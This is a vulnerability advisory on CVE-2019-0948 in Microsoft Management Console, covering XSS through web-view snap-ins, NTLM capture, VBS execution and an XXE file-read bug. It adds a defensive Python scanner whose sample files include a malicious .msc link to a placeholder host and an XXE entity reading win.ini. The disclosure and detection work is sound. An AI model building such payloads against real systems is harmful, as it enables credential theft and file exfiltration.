June 11, 2019
Research by: Eran Vaknin and Alon Boxiner
The purpose of Microsoft Management Console (MMC) is to provide a programming platform for creating and hosting applications that manage Microsoft Windows-based environments, and to provide a simple, consistent and integrated management user interface and administration model.
Recently, Check Point Research discovered several vulnerabilities in the console that would allow an attacker to create a malicious payload.
Microsoft has assigned CVE-2019-0948 to this vulnerability and patched it in their June 11th Patch Tuesday release.
1) Multiple XSS vulnerabilities due to a misconfigured WebView.
MMC has a built-in Snap-In component which in turn contains several mechanisms such as ActiveX Control, Link to Web Address, etc.
- When an attacker chooses the Link to Web Address snap-in, he can insert a link to his server which contains an HTML page with a malicious payload.
As the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed.
We have successfully managed to insert a malicious URL link that contains malicious payloads such as a redirection to an SMB server that will capture the user's NTLM hash.
Moreover, it is also possible to execute VBS script on the victim's host via the mentioned web-view.
- An attacker chooses the ActiveX Control snap-in (all ActiveX controls are vulnerable) and saves it to a file (.msc file). In the .msc file, under the StringsTables section, the attacker changes the third string value to a malicious link under his control, containing an HTML page with a malicious payload. As mentioned in section a (above), we have successfully managed to insert a malicious URL link that contains malicious payloads such as a redirection to an SMB server that will capture the user's NTLM hash.
Moreover, it is also possible to execute VBS script on the victim's host via the mentioned web-view.
As the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed.
2) Self XXE vulnerability due to a misconfigured XML parser.
A victim opens the MMC, chooses the Event Viewer snap-in, clicks on Action and then on Import Custom View. Once a malicious XML file is selected (containing an XXE payload), any file from the victim's host is sent to the attacker.
This is possible due to a misconfigured XML parser defined within the MMC custom view functionality.
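Both issues above leave a recognisable trace in the file the victim is asked to open: a console file whose string table points a web-view at a remote server, or a custom-view XML that carries a DOCTYPE/ENTITY declaration, which an XXE payload needs and an ordinary exported view does not. The following scanner is an added example for defenders (it is not Check Point's or Microsoft's code) that flags both before the file reaches MMC. It assumes .msc files are XML whose strings sit under a StringTables/StringTable/Strings/String hierarchy, that legitimate custom views contain no DTD, and that internal hosts can be allowlisted; the sample documents, the `payload.example` host and the 192.0.2.10 address are constructed placeholders, and `ViewerConfig`/`QueryConfig` are assumed element names.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Link shapes a web-view snap-in could be pointed at: web URLs and UNC paths
# (the NTLM-capture payload described in the advisory relies on an SMB redirect).
LINK_RE = re.compile(r"(?i)(?:https?|ftp|file)://\S+|\\\\[^\s\\]+\\\S+")
# Any DOCTYPE/ENTITY declaration: required by an XXE payload, not expected in
# an MMC custom view (assumption: legitimate exported views carry no DTD).
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(xml_text):
    """True if the document declares a DOCTYPE or an ENTITY."""
    return DTD_RE.search(xml_text) is not None


def find_links(xml_text):
    """Return every URL/UNC-looking value found in element text or attributes.
    Only call this after has_dtd() returned False, so no entity is ever expanded."""
    links = []
    for elem in ET.fromstring(xml_text).iter():
        for value in [elem.text or ""] + list(elem.attrib.values()):
            links.extend(LINK_RE.findall(value))
    return links


def link_host(link):
    """Host part of an http(s)/ftp/file URL or of a \\\\host\\share UNC path."""
    if link.startswith("\\\\"):
        return link[2:].split("\\", 1)[0].lower()
    return (urlparse(link).hostname or "").lower()


def assess(xml_text, allowed_hosts=frozenset({"localhost", "127.0.0.1"})):
    """Classify a console (.msc) or custom-view file.
    Returns a list of findings; an empty list means nothing suspicious was found."""
    if has_dtd(xml_text):
        # Stop here: a DTD-bearing view is never handed to an XML parser.
        return ["dtd-declaration"]
    return ["external-link:" + link for link in find_links(xml_text)
            if link_host(link) not in allowed_hosts]


# --- constructed samples (not real files from the advisory) ---
MSC_BENIGN = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables><StringTable><Strings>
    <String ID="1">Console Root</String>
    <String ID="2">Event Viewer (Local)</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

# Third string replaced with an attacker-controlled page, plus an SMB share;
# both hosts are documentation placeholders.
MSC_WEBLINK = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables><StringTable><Strings>
    <String ID="1">Console Root</String>
    <String ID="2">Link to Web Address</String>
    <String ID="3">http://payload.example/page.html</String>
    <String ID="4">\\\\192.0.2.10\\share</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

# Custom view carrying an external entity declaration, the XXE indicator.
VIEW_XXE = """<?xml version="1.0"?>
<!DOCTYPE ViewerConfig [<!ENTITY ext SYSTEM "file:///c:/windows/win.ini">]>
<ViewerConfig><QueryConfig>&ext;</QueryConfig></ViewerConfig>"""

if __name__ == "__main__":
    for name, doc in [("benign", MSC_BENIGN), ("weblink", MSC_WEBLINK), ("xxe", VIEW_XXE)]:
        print(name, assess(doc) or "clean")
```

The DTD check is deliberately a plain text match performed before any parsing: the vulnerable component here is the parser itself, so the safe control is to refuse the document rather than to trust parser options. The link check walks every text node and attribute instead of only the third string, so a payload placed in a different string slot is caught as well.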
Proof of Concept
1) Link to Web Address snap-in Cross-Site Scripting (XSS):
The attacker adds a new snap-in:
The attacker chooses a Link to Web Address snap-in:
The attacker then types the path to his server containing the malicious payload:
The attacker saves the .msc file and sends it to the victim:
The malicious .msc file contains the path to the attacker's server:
As the victim opens the malicious .msc file, VBS code is executed:
2) ActiveX Control snap-ins (Adobe Acrobat DC Browser example):
The attacker adds a new snap-in:
The attacker chooses an ActiveX Control snap-in:
The ActiveX Control mechanism is then selected (Adobe Acrobat DC Browser as an example):
The attacker saves the .msc file and sends it to the victim:
The malicious .msc file contains the path to the attacker's server:
As the victim opens the malicious .msc file, VBS code is executed:
3) Self XXE Vulnerability Due to Misconfigured XML Parser:
Add a snap-in:
The attacker chooses the Event Viewer snap-in:
The victim selects 'Action' and then clicks on the 'Import Custom View' option:
The victim selects the malicious XML sent by the attacker:
The malicious XML containing the XXE payload will read the c:\windows\win.ini file content and send it to the remote server via an HTTP GET request:
Which in turn will call xml.dtd:
The desired file content is sent from the client console application to a remote server: